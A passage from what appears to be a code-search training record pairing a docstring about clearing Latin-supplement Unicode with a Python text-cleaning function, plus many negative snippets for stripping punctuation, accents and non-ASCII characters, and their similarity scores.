sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def remove_control_chars(json_string):\n return re.sub('[\\x00-\\x1f]', '',json_string)", "def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text", "def clean_smile(self, smi):\n smi = smi.replace('\\n', '')\n return smi", "def cleanup_input(data):\n data = re.sub(r'[^0-9A-Za-z ()_,.-:]', '', data)\n return data", "def filter_blanks(user, str):\n if user.is_staff:\n return str\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def preprocess_msg(self):\n self.tmp_msg = self.tmp_msg.lower()\n cleared = ''\n for ch in self.tmp_msg:\n if ch in string.ascii_lowercase:\n cleared += ch\n\n c = ''\n for ch in cleared:\n c += '{:02d}'.format(ord(ch) - 97)\n if len(c) % 4 != 0:\n c += '99'\n self.tmp_msg = c\n\n super().preprocess_msg()", "def sanitise(s, max_len=MAX_STRING_LENGTH):\n result = ''\n if len(s) > max_len:\n s = s[0: max_len // 2] + \"\\n*** <snip> ***\\n\" + s[-max_len // 2:]\n lines = s.rstrip().splitlines()\n for line in lines:\n for c in line.rstrip() + '\\n':\n if c < ' ' and c != '\\n':\n if c == '\\t':\n c = r'\\t'\n elif c == '\\r':\n c = r'\\r'\n else:\n c = r'\\{:03o}'.format(ord(c))\n result += c\n return result.rstrip()", "def clean_text(text):\n return text.replace('\\n', ' ').replace('\\r', ' ')", "def remove_non_ascii(text):\n return re.sub(r'[^\\x00-\\x7F]', ' ', text)", "def cleanData(rawData):\n\trawData = re.sub(r'R-LRB- \\(', r'R-LRB- -LRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\)', r'R-RRB- -RRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\(', r'R-RRB- -LRB-', rawData)\n\trawData = re.sub(r'-LRB- \\(', r'-LRB- -LRB-', rawData)\n\trawData = re.sub(r'-RRB- \\)', r'-RRB- -RRB-', rawData)\n\trawData = re.sub(r'PU \\(', r'PU -LRB-', rawData)\n\trawData = re.sub(r'PU \\)', r'PU -RRB-', rawData)\n\trawData = re.sub(r':-\\)', r'smileyface', rawData)\n\n\treturn rawData", "def clean_text_for_skill_extraction(text):\n multi_space_regex = re.compile(r\"[,;?!()\\\\/]\", re.IGNORECASE)\n text = re.sub(multi_space_regex, ' ', text)\n\n text = clean_text_from_private_unicode(text)\n text = clean_text_from_geometrical_shape_unicode(text)\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n return text", "def cleanUpString(text):\r\n if text is None or text == '':\r\n return text\r\n try:\r\n text = text.encode(\"utf-8\")\r\n except:\r\n newText = \"\"\r\n t = text.decode(\"utf-8\")\r\n for c in t:\r\n newC = c\r\n if ord(c)>127:\r\n newC = \"&#%s;\" % ord(c)\r\n if ord(c)==8211:\r\n #change to this otherwise the toc has &#8211; value instead of endash\r\n newC = chr(45)\r\n if ord(c)==160:\r\n #&nbsp;\r\n newC = \" \"\r\n newText += newC\r\n text = newText\r\n text = str(text)\r\n return text", "def wipe_bad_chars(filename):\n return multi_replace(filename, {'(': '', ' ': '_', ')': '', '/': '_'})", "def replaceNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else ' ' for i in text])", "def sanitize_unicode(value):\n return re.sub(\"[\\x00-\\x08\\x0B\\x0C\\x0E-\\x1F\\uD800-\\uDFFF\\uFFFE\\uFFFF]\", \"\", value)", "def _sanitize(text):\n # TODO: any cleanup needed here?\n if text is None:\n return None\n text = text.replace('\\n', ' ')\n return text", "def del_whitespace(selfs, text):\n\t\treturn text.replace(' ', '')", "def tidy_string(s: str\n ) -> str:\n s = s.encode('ascii', errors='ignore').decode(FORMAT)\n s = s.replace(\"\\r\", \"\").replace(\"\\t\", \"\").replace('\\n', '') \n return s", "def fix_horizontal(line):\n\tline = line.rstrip()\n\tline = untabify(line, tab_width)\n\treturn line + '\\n'", "def unscorize(s):\n return s.replace(\" \", \"_\")", "def preprocess_input(self, text):\n text = re.sub(r\"([^a-zA-Z0-9 -]+ +[^a-zA-Z0-9 -]*|[^a-zA-Z0-9 -]*\" +\n \" +[^a-zA-Z0-9 -]+)\", ' ', text, flags=re.UNICODE)\n text = re.sub(r\"([^a-zA-Z0-9 -]+$|^[^a-zA-Z0-9 -]+)\", '', text)\n text = re.sub(r\"([a-zA-Z0-9 -]+?)([^a-zA-Z0-9 -])([a-zA-Z0-9 -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE)\n text = re.sub(r\"([\\x00-\\x7F -]+?)([^a-zA-Z0-9 -]+)([\\x00-\\x7F -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE).encode(\"utf-8\")\n return re.sub(r\"([^a-zA-Z0-9 \\-\\'])\", '', text, flags=re.UNICODE)", "def remove_linebreaks(self, text):\n return re.sub(ur\"\\n(?!(\"\n u\"DZIAŁ [IVXLC]|\"\n u\"Rozdział [IVXLC1-9]|\"\n u\"Art\\.|\"\n u\"§ \\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\)|\"\n u\"[a-z]+\\)|\"\n u\"–))\", \" \", text)", "def dealCommonline(line):\n\n print \"\\t\\t%s\" % (line.strip('\\n'))", "def fixString(string):\n string = re.sub(r\"[^A-Z-]\", \"\", string)\n string = string.strip(\"\\n\")\n return string", "def remove_nonspacing_marks(string):\n return ''.join(c for c in unicodedata.normalize('NFKD', string) if unicodedata.category(c) !='Mn')", "def strip_space():\n pass", "def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text" ]
[ "0.6923628", "0.6923628", "0.6871189", "0.68013835", "0.6612186", "0.6590212", "0.643773", "0.6276485", "0.6224105", "0.6136164", "0.60882586", "0.6054826", "0.6043292", "0.60300654", "0.6018717", "0.6001594", "0.5968716", "0.59620196", "0.59620196", "0.5959176", "0.593358", "0.5914048", "0.5872205", "0.5867018", "0.5842751", "0.57787925", "0.57743746", "0.5762607", "0.5756598", "0.57400644", "0.57089514", "0.5707818", "0.56959844", "0.56660724", "0.5664579", "0.56587404", "0.5658496", "0.5638603", "0.5636524", "0.5631201", "0.5621759", "0.56176007", "0.5599863", "0.55944127", "0.5592653", "0.5590339", "0.5554869", "0.5554869", "0.55541056", "0.5550795", "0.5547879", "0.5547769", "0.55441797", "0.5543299", "0.5522171", "0.5510517", "0.54934865", "0.5493036", "0.54806995", "0.5478682", "0.54752594", "0.5474899", "0.5474503", "0.5469532", "0.5456138", "0.54524356", "0.54442614", "0.5442992", "0.5413448", "0.5409676", "0.54087716", "0.5405295", "0.5402027", "0.54011834", "0.5400795", "0.54006964", "0.5397758", "0.53891706", "0.53886837", "0.5385197", "0.5384921", "0.53836644", "0.5382932", "0.5382183", "0.5381626", "0.5381314", "0.5379709", "0.5379305", "0.5378611", "0.53728986", "0.534968", "0.5340396", "0.5337376", "0.5328271", "0.5326454", "0.5325778", "0.5325379", "0.53195727", "0.53173584" ]
0.8404962
1
Clears the text from latin supplement unicodes.
def clean_text_from_latin_supplement_unicode(text): return re.sub(r"([\u0080-\u00FF])", " ", text)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])", "def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text", "def removeUnicode(text):\n text = re.sub(r'(\\\\u[0-9A-Fa-f]+)',r'', text) \n text = re.sub(r'[^\\x00-\\x7f]',r'',text)\n return text", "def clear_text(self):\n self.textBrowser.clear()\n #self.ser.flushInput()\n #self.clean_graph()", "def clear_trash(text):\n for i in TRASH:\n text = text.replace(i, '')\n\n return text", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)", "def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_diacritics(self, text):\n text = re.sub(self._arabic_diacritics, '', text)\n return text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clear_accents(cls) -> None:\n\n cls.__registered_accents = set()", "def cleanUpString(text):\r\n if text is None or text == '':\r\n return text\r\n try:\r\n text = text.encode(\"utf-8\")\r\n except:\r\n newText = \"\"\r\n t = text.decode(\"utf-8\")\r\n for c in t:\r\n newC = c\r\n if ord(c)>127:\r\n newC = \"&#%s;\" % ord(c)\r\n if ord(c)==8211:\r\n #change to this otherwise the toc has &#8211; value instead of endash\r\n newC = chr(45)\r\n if ord(c)==160:\r\n #&nbsp;\r\n newC = \" \"\r\n newText += newC\r\n text = newText\r\n text = str(text)\r\n return text", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def clear(self):\n self.sentence.clear()", "def clean_up_text(text):\n text = html.unescape(text)\n return remove_emoji(text)", "def remove_non_ascii(text):\n return re.sub(r'[^\\x00-\\x7F]', ' ', text)", "def clean_unicode(text):\n clean_text = text.encode(\"ascii\", errors=\"replace\").strip().decode(\"ascii\")\n clean_text = clean_text.replace(\"?\", ' ')\n return clean_text", "def remove_unicode_diac(text):\n # Replace diacritics with nothing\n text = text.replace(u\"\\u064B\", \"\") # fatHatayn\n text = text.replace(u\"\\u064C\", \"\") # Dammatayn\n text = text.replace(u\"\\u064D\", \"\") # kasratayn\n text = text.replace(u\"\\u064E\", \"\") # fatHa\n text = text.replace(u\"\\u064F\", \"\") # Damma\n text = text.replace(u\"\\u0650\", \"\") # kasra\n text = text.replace(u\"\\u0651\", \"\") # shaddah\n text = text.replace(u\"\\u0652\", \"\") # sukuun\n text = text.replace(u\"\\u0670\", \"`\") # dagger 'alif\n return text", "def clear(self):\n\n try:\n label, = self._displayedChar.get_children()\n except ValueError:\n return\n\n label.set_markup(\"\")\n self.dot7.lowerDot()\n self.dot8.lowerDot()", "def clearText(self, element_tuple):\n self.log_info(f\"Browser.clearText: Clearing the text of {element_tuple}\")\n self.CORE.find_element(*self.format_element(element_tuple)).clear()\n return", "def replaceNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else ' ' for i in text])", "def remove_punct(self,text):", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clear_all(entry):\n text = entry.clear_all()", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def clear_text(self):\r\n tu.reset()\r\n self.dt_x = self.disp_left\r\n self.dt_y = self.disp_top\r\n tu.penup()\r\n tu.goto(self.dt_x, self.dt_y)\r\n tu.pendown()", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def reset():\r\n simpleText.delete(0.0, 'end')\r\n crypticText.delete(0.0, 'end')\r\n simpleText.insert(INSERT, \"Enter Message Here...\\n\\nDouble-click to edit\\nRight-click to Copy\\nShift + Left-click to Paste\")\r\n crypticText.insert(INSERT, \"Paste Your Cipher Here...\\n\\nDouble-click to edit\\nRight-click to Copy\\nShift + Left-click to Paste\")", "def remove_non_alphabetic_text(text):\n return RegexFilters.replace_non_alphabetic_text(text, \"\")", "def _remove_diacritics(self, text: str) -> str:\n nfkd_form = unicodedata.normalize(\"NFKD\", text)\n return \"\".join([char for char in nfkd_form if not unicodedata.combining(char)])", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_accented_chars(text):\n text = unidecode.unidecode(text)\n return text", "def remove_accented_chars(text):\n text = unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n return text", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def remove_accents(text):\n return ''.join(c for c in unicodedata.normalize('NFKD', text)\n if unicodedata.category(c) != 'Mn')", "def clear_all(self):\n self._set_all(0x00, 0x00, 0x00)", "def _run_strip_accents(self, text):\n text = unicodedata.normalize('NFD', text)\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == 'Mn':\n continue\n output.append(char)\n return ''.join(output)", "def remove_emoji(txt):\n pattern = (\"[\\U0001F600-\\U0001F64F\"\n + \"\\U0001F300-\\U0001F5FF\"\n + \"\\U0001F680-\\U0001F6FF\"\n + \"\\U0001F1E0-\\U0001F1FF]+\")\n return re.sub(pattern, \"\", txt)", "def _run_strip_accents(self, text):\n text = unicodedata.normalize(\"NFD\", text)\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == \"Mn\":\n continue\n output.append(char)\n return \"\".join(output)", "def strip_accents(text):\n text = unicodedata.normalize(\"NFD\", text)\n text = text.encode(\"ascii\", \"ignore\")\n text = text.decode(\"utf8\")\n return text", "def clear(self):\n for inp in self.inputlst:\n inp.setText(\"\")", "def _run_strip_accents(self, text):\n text = unicodedata.normalize(\"NFD\", text)\n output = []\n for char in text:\n cat = unicodedata.category(char)\n if cat == \"Mn\":\n continue # pragma: no cover\n output.append(char)\n return \"\".join(output)", "def clear_all(cls):\n del cls.text_labels[:]", "def on_clearText(self):\n super(Comment, self).on_clearText()\n self.teText.setHtml(self.stored)\n self.rf_widgetVis()\n self.stored = None", "def clear(self):\n self.knownStrings.clear()", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def _hidden_in_unicode(self, txt):", "def fix_text(text):\n ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))\n text = text.replace('\\n', '')\n text = text.upper()\n\n return text.strip()", "def remove_emojis(text):\n # http://stackoverflow.com/a/13752628/6762004\n RE_EMOJI = re.compile('[\\U00010000-\\U0010ffff]', flags=re.UNICODE)\n return RE_EMOJI.sub(r'', text)", "def remove_non_ascii(words):\n #Revisar esta funcion porque no filtra nada...\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def actionClear(self):\n self.setText(\"\")", "def clean_text(text_list):\n remove_char = u'!\"#%\\'()*+,-./:;<=>?@[\\]^_`{|}~$1234567890'\n translate_table = dict((ord(char), None) for char in remove_char)\n translate_table[ord(u'\\n')] = ord(' ')\n for i in range(0, len(text_list)):\n text_list[i] = (xstr(text_list[i])).lower().translate(translate_table)\n return text_list", "def clearOld(self):\n self.monitorTextBox.setPlainText(\"\")", "def remove_non_ascii(self, words):\n\t\tnew_words = []\n\t\tfor word in words:\n\t\t\tnew_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n\t\t\tnew_words.append(new_word)\n\t\treturn new_words", "def force_ascii(text):\n return \"\".join([c for c in text if ord(c) < 128])", "def remove_emoji(text):\n return emoji.get_emoji_regexp().sub(u'', text)", "def clear_result(self):\n\n self.ui.plainTextEdit.clear()", "def remove(text, *args):\n\n chars = \"\".join(args)\n for char in chars:\n text = text.replace(char, \"\")\n\n return text", "def clear():", "def Clear(self) -> None:", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def onclick_rxclear(self, event): # wxGlade: TerminalFrame.<event_handler>\n self.rx_text.Clear()", "def clear_punctuation(document):\n return re.sub(r'\\D', '', str(document))", "def remove_emoji_punc(text):\n \n allchars = [str for str in text]\n emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]\n clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])\n\n \n s1 = clean_text.replace(u'’', u\"\").replace(\"'\",\"\")\n s1 = re.sub(r'[^a-z0-9 ]+', ' ', s1)\n \n return \" \".join(s1.split())", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def remove_non_ascii(words):\r\n new_words = []\r\n for word in words:\r\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\r\n new_words.append(new_word)\r\n return new_words", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def strip_accents(text):\n text = six.ensure_text(text)\n text = unicodedata.normalize('NFD', text)\n text = text.encode('ascii', 'ignore')\n return str(text)", "def _clean(self, texts, no_punc=False):\n result = ''\n sw = self._sw_no_punc_dict if no_punc else self._sw_dict\n for t in texts:\n if t not in sw:\n result += t\n return result", "def clean_non_chinese_symbols(text):\n text = regex.sub('[!!]+', \"!\", text)\n text = regex.sub('[??]+', \"?\", text)\n text = regex.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" UNK \", text)\n return regex.sub(\"\\s+\", \" \", text)", "def removeThreeByteUtf(html):\n entRe = re.compile('&#x[0-9ABCDEabcde]{5,9}')\n return entRe.sub('<WideUnicodeChar>', html)", "def _remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def reset(self):\n self.descripcionString.set(\"\")\n self.tituloString.set(\"\")", "def _strip_text(text):\n text = re.sub(r'[ ,?:]|%s', \"\", text.lower())\n for chr in \"-%\":\n new_text = text.replace(chr, \"\")\n if new_text:\n text = new_text\n return text.lower()", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text" ]
[ "0.69256425", "0.6896335", "0.68667537", "0.67069024", "0.66337216", "0.65545833", "0.6554385", "0.6529281", "0.6484313", "0.6460039", "0.6445077", "0.64252377", "0.64120406", "0.6407746", "0.6383768", "0.6383287", "0.6367802", "0.6363216", "0.6355911", "0.631609", "0.63075715", "0.62900394", "0.6281164", "0.62550473", "0.62434953", "0.6241916", "0.6241916", "0.6238193", "0.6200551", "0.6197106", "0.61609584", "0.6143517", "0.6128857", "0.6124016", "0.61118704", "0.61080265", "0.6065436", "0.6041815", "0.60270816", "0.60164154", "0.6015353", "0.60034245", "0.60011697", "0.5995145", "0.59827405", "0.59746754", "0.5973762", "0.59546465", "0.5950779", "0.59427124", "0.59427124", "0.59427124", "0.59427124", "0.59427124", "0.59427124", "0.5912458", "0.5911024", "0.5885367", "0.588064", "0.5879735", "0.58543557", "0.5839575", "0.5835184", "0.583113", "0.58285576", "0.5822574", "0.5820032", "0.58182806", "0.5806365", "0.5806045", "0.5806045", "0.5806044", "0.5799253", "0.57956296", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.5784573", "0.57839906", "0.57743686", "0.57709855", "0.5767211", "0.57669765", "0.5763891", "0.5761179", "0.5761179", "0.5751517", "0.5742191", "0.5739424", "0.5739424", "0.5739424", "0.5739424", "0.5739424", "0.5739424", "0.5737425" ]
0.6754026
4
Clears the text from general punctuation unicodes
def clean_text_from_general_punctuation_unicode(text): return re.sub(r"([\u2000-\u206F])", " ", text)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_punct(self,text):", "def clear_punctuation(document):\n return re.sub(r'\\D', '', str(document))", "def remove_punctuation(self, text):\n punct = string.punctuation\n trantab = str.maketrans(punct, len(punct) * ' ')\n return text.translate(trantab)", "def remove_punctuations(self, text):\n translator = str.maketrans('', '', self._punctuations_list)\n return text.translate(translator)", "def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)", "def remove_punct(text):\r\n table = str.maketrans('', '', string.punctuation)\r\n return text.translate(table)", "def remove_punctuation(text: str) -> str:\n return \"\".join(\n itertools.filterfalse(lambda x: unicodedata.category(x).startswith(\"P\"), text)\n )", "def remove_punctuations(text):\n return text.translate(str.maketrans('', '', string.punctuation))", "def punct_remove(text):\n return(re.sub(punct_characters,' ',text))", "def remove_punctuation(text):\n return re.sub('[,.?\";:\\-!@#$%^&*()]', '', text)", "def remove_punctuation(text):\n return text.translate(None, string.punctuation)", "def remove_punctuation(text):\n s =[]\n for char in text:\n if char in punc:\n s.append(\" \")\n else:\n s.append(char) \n return \"\".join(s)", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def stripPunctuation(text):\n exclude = set(string.punctuation)\n clean_text = ''.join(ch for ch in text if ch not in exclude)\n clean_text = clean_text.replace('\\n',' ') # Let's account for newline characters also \n return clean_text.encode('ascii','ignore')", "def remove_punctuation(text):\n bad_characters = [\".\", \",\", \";\", \"!\", \"?\", \":\", \"(\", \")\", \"-\", \"/\", \"*\",\n \"' \", \" '\", '\"', \"&\"]\n for bad_character in bad_characters:\n text = text.replace(bad_character, \"\")\n return text.lower()", "def remove_punc(text):\n for punctuation in string.punctuation:\n text = text.replace(punctuation, ' ')\n text = re.sub(\" +\", \" \", text)\n return text", "def removeOwnPunctuation(self):\n\t\tself.textFile = self.removePunctuation(self.open(self.filePath)).split()", "def remove_punctuation(text):\n import string\n PUNCT_TO_REMOVE = '''!()-[]{};:'\"\\,<>/?@#$%^&*_~'''\n no_punct = \"\"\n for char in text:\n if char not in PUNCT_TO_REMOVE:\n no_punct = no_punct + char\n else:\n no_punct = no_punct + ' '\n return(no_punct)", "def remove_puncts(text):\n # regex rocks\n #return re.sub('[%s]'%PUNCTS, ' ', text)\n return REMOVE_PUNCTS_RE.sub(' ', text)", "def removePunctuation(text):\n return re.sub(r'[^A-Za-z0-9 ]', ' ', text).strip()", "def remove_punctuation(self):\n new_words = []\n # new_words = \"\"\n for word in self.words:\n new_word = re.sub(r'[^\\w\\s]', '', word)\n if new_word != '':\n new_words.append(new_word)\n # new_words += f\"{new_word} \"\n self.words = new_words\n return self", "def remove_punct(sample):\n sample[\"full_text\"] = \"\".join([char for char in sample[\"full_text\"] if char not in punct_dic])\n return sample", "def _remove_punctuation(text: str) -> str:\n punctuation = string.punctuation + '¿¡'\n table = str.maketrans('', '', punctuation)\n words = text.split()\n\n stripped = [word.translate(table) for word in words]\n\n return ' '.join(stripped)", "def remove_punctuation(text):\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n return text", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def remove_punctuation(text):\n text = re.sub(r'[^\\w\\s]', ' ', text)\n return text", "def removePunctuation(self, text=None):\n\t\t# Loop through all the punctuation in self.stop_puncs\n\t\tfor punctuation in self.stop_puncs:\n\n\t\t\t# Replace punctuation with leading and trailing spaces\n\t\t\ttext = text.replace(\" \" + punctuation, \" \")\n\t\t\ttext = text.replace(punctuation + \" \", \" \")\n\n\t\t\t# Replace punctuation within the first and last 5 characters of the text\n\t\t\ttext = text[:5].replace(punctuation, \"\") + 